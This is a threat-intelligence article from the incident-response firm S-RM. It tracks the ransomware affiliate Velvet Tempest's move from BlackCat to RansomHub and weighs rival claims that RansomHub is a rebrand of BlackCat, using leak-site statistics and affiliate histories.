S-RM identified a ransomware affiliate tracked as Velvet Tempest deploying ransomware with RansomHub, the latest indication that former BlackCat members are moving to the outfit, writes Tim Geschwindt.
In late June 2024, S-RM responded to a ransomware incident affecting a company’s infrastructure in Europe and Asia. The perpetrator was the ransomware affiliate tracked as Velvet Tempest (previously tracked as DEV-0504) by Microsoft, and whose new developments of the ExMatter data exfiltration tool we documented earlier this year.
The article in 30 seconds:
- Velvet Tempest, a well-known threat actor, has followed other high-profile former BlackCat members and joined RansomHub, supporting the notion that RansomHub is a new major group in the ransomware ecosystem.
- Some evidence suggests that RansomHub may be led by the administrators of BlackCat, which if true, suggests their administrators are untrustworthy and may steal ransom payments from their own members.
- Eroding trust between cybercriminals is an important part of long-term disruption of the ecosystem.
Eye of the storm
We have been tracking Velvet Tempest across major cyber incidents since 2021, as they move between the most prolific ransomware-as-a-service (‘RaaS’) groups in the ecosystem (Figure 1). These ‘RaaS’ operations are typically well organised but decentralised; their members could be from anywhere in the world, but the administrators are often located in jurisdictions well out of reach of international law enforcement. The administrators rarely perpetrate attacks themselves and are instead responsible for coding the ransomware, and building and administering the leak sites, negotiation portals and cryptocurrency money laundering process. When a RaaS operation disbands, rebrands or is disrupted by law enforcement, Velvet Tempest moves to the next-best RaaS service.
Figure 1: Timeline of ransomware variants deployed by Velvet Tempest since 2020. Source: Microsoft, S-RM.
The latest such organisation is RansomHub. Since the first company was posted on their leak site on 10 February, RansomHub has gone on to post 138 organisations in 171 days - a rate which makes them one of the most active groups in the ransomware ecosystem. However, due to the ‘iceberg effect’ (in which many incidents go undetected as the victim either paid the ransom or the criminal lost the stolen data with which to use as leverage) the actual number of companies impacted by RansomHub is likely to be three times the size.
Tempests, spiders and black cats
RansomHub’s appearance and rapid ramp up in activity coincided with the implosion of a major RaaS group known as ALPHV (aka BlackCat), when their administrators ran an exit scam on their own members under the guise of a law enforcement takedown. Velvet Tempest was a long-time member of BlackCat, joining in late 2021, and is the latest in a string of high-profile former members to appear at RansomHub. Earlier this year the perpetrator of the February Change Healthcare breach and Scattered Spider, the group behind the Caesars Entertainment and MGM Resorts incidents in 2023, were both identified deploying RansomHub ransomware suggesting they had both signed up to the new operation. The observation that at least three known entities (Velvet Tempest; Scattered Spider; and the Change Healthcare perpetrator) have moved from BlackCat to RansomHub is not groundbreaking, affiliates move to new services all the time as Velvet Tempest’s history shows us; however, perhaps the relationship between BlackCat and RansomHub is more direct.
Figure 2: The number of leaks on BlackCat and RansomHub's leak sites since October 2023. Source: ecrime.ch.
The number of postings on BlackCat and RansomHub’s leak sites since October 2023 shown above in Figure 2 tells its own story. Within weeks of setting up their infrastructure, and with little to no brand reputation, RansomHub had been able to attract enough members and establish themselves as one of the most active ransomware groups. This is unusual for a new group as it often takes months to convince members of the community that the new RaaS is secure, reliable and the administrators will not double cross customers and pocket the profit. However, RansomHub appear to have had no such issues, quickly attracting experienced affiliates from other high profile operations and reaching a level of activity which makes them the second most active RaaS operation in the ecosystem after Lockbit 3.0. The graph below shows how RansomHub operations have continued to increase whilst other major groups have remained stagnant or decreased the number of victims posted to their leak sites.
Figure 3: The number of victims posted to Ransomware group leak sites since February 2024. (Note: We have excluded Lockbit 3.0 leaks from this graph for legibility.) Source: ecrime.ch.
While this does suggest RansomHub has become one of the most significant RaaS operations and has attracted experienced cybercriminals who used to operate under the BlackCat brand, it does not definitively link RansomHub to BlackCat’s collapse. In a profile of the RansomHub group that S-RM will publish later in the year as part of our new Ransomware in Focus series, we will highlight how RansomHub’s operations are conducive to attracting affiliates. Unlike most RaaS operations in which the administrators will take a 20-30 percent portion of any ransom an affiliate receives, RansomHub pays its members a 90 percent commission. And unlike BlackCat, and many others, the administrators do not insist on receiving the payment and divvying it out to their affiliates, instead the affiliate receives the demand and pays 10% to the administrators, granting much greater control to their members and reducing the risk that affiliates are scammed by administrators.
A rebrand?
At this stage, the overlap between the groups ends. RansomHub was created at approximately the same time that BlackCat’s administrators shut down their infrastructure; it has grown to eclipse most other groups in the ransomware ecosystem; and it has attracted many of BlackCat’s high profile affiliates including N0tchy, members of the Scattered Spider threat group, and now as we’ve detailed here, Velvet Tempest.
Figure 4: The administrator of Cyclops and Knight ransomware selling its source code in February 2024. Source: KELA
RansomHub’s admins appear to have purchased source code built by the threat actor behind Knight ransomware. Knight’s admins put the ransomware up for sale to a single buyer in February 2024, which matches when RansomHub began delivering their payload. According to analysis by Symantec, RansomHub changed little from the original aside from adding a sleep command. In the past, groups have been tracked based on the code used to build their ransomware programs, and thus buying one for sale is an effective way of severing that genetic code heritage. Similarly, we have not seen any shared use of IP addresses, ransom note formats, or cryptocurrency wallets which might suggest further linkages between the two groups.
Accusations from a rival
While we have found no definitive links between RansomHub and BlackCat, one of RansomHub’s rivals has suggested otherwise. LockBitSupp, the primary administrator of the rival ransomware group LockBit, and whom US authorities identified as Dmitry Khoroshev in April 2024, claims that RansomHub is not just home to BlackCat’s former affiliates, but their tarnished administrators too.
Figure 5: LockBitSupp's status on the private messaging service, TOX, which translates to "RansomHub is a rebrand of BlackCat, be careful". Source: TOX
In late July 2024, LockBitSupp, posting on the TOX private messaging service where he maintains an active account, changed his status to “RansomHub is a rebrand of BlackCat, be careful”. This message serves as a warning to others in the ransomware ecosystem: BlackCat stole from their members and this is the same group of people, do not join them.
Whether LockBitSupp’s claim is accurate or not is up for debate. In recent times his group has made several false claims, such as breaching the Federal Reserve Bank or Marvel, both of which turned out to be false. LockBitSupp also has a lot to gain from making the connection: by sowing discord and distrust about RansomHub he may prevent some of his most experienced members from leaving LockBit to join them. RaaS operations are competitive, and the chance to earn 90 percent of each ransom demand at RansomHub instead of 70 percent they would receive at Lockbit’s will entice some. While others may look at law enforcement’s infiltration of Lockbit’s inner sanctum earlier in 2024, which resulted in the arrest of several affiliates, as a reason to look elsewhere.
While assessing any claim made by LockBitSupp with healthy suspicion, a rebrand does make sense for BlackCat’s administrators. One of the reasons a RaaS like BlackCat may give up their established brand to start anew is to shed a tarnished reputation. BlackCat carefully built a reputation of reliability and trustworthiness, before they reportedly stole USD 22 million from a long-term partner of the BlackCat RaaS, known as “N0tchy”, and placed a fake law enforcement takedown notice on their website to disguise the theft. This exit scam irrevocably broke the trust between the BlackCat administrators and their members. Should the ecosystem begin to believe that the BlackCat administrators are the same individuals behind RansomHub, there may be a similar erosion of trust and the organisation may fracture.
Unfortunately, a definitive answer on the links between BlackCat and RansomHub is unlikely to surface soon. Whoever is behind RansomHub made no glaring operational security errors during their launch – no reuse of old cryptocurrency wallets, recycling old code used in their encryptor, utilising old infrastructure for attacks, negotiating using the same playbook – which might lead to quick answers about who they are. When a group fails to make any obvious operational security (aka OPSEC) errors like this, the answer about their identity and link to previous groups is often left unanswered until a law enforcement infiltration operation or internal data leak later down the line to provide the security community with some further insight.
So what?
The purpose of tracking threat actors like Velvet Tempest while they move between groups like BlackCat and RansomHub is two-fold. Firstly, threat actors thrive on anonymity. The possibility of identifying them furthers the idea that their actions are traceable and that they are being closely watched. It is difficult to cause long term disruption to ransomware groups whose administrators operate in jurisdictions out of reach of international law enforcement. As such, increasingly the aim of the cyber security community is to understand how these cybercriminal communities operate and find ways to erode the trust between individuals and groups. Secondly, we track actors like Velvet Tempest to improve how we respond to cyber incidents. By understanding how these groups work, the links between them, and who is working under which brand, we can increase the effectiveness of our containment and recovery, forensics, and threat actor negotiations work. For example, knowing Velvet Tempest is involved in an incident enables us to hunt for the threat actor’s favourite persistence techniques: in Velvet Tempest’s case a scheduled task which hides a SSH shell if the environment is well-protected, an ExMatter trojan if it isn’t. Using cyber threat intelligence in this way reduces the risk of reinfection for our clients and accelerates recovery timelines.
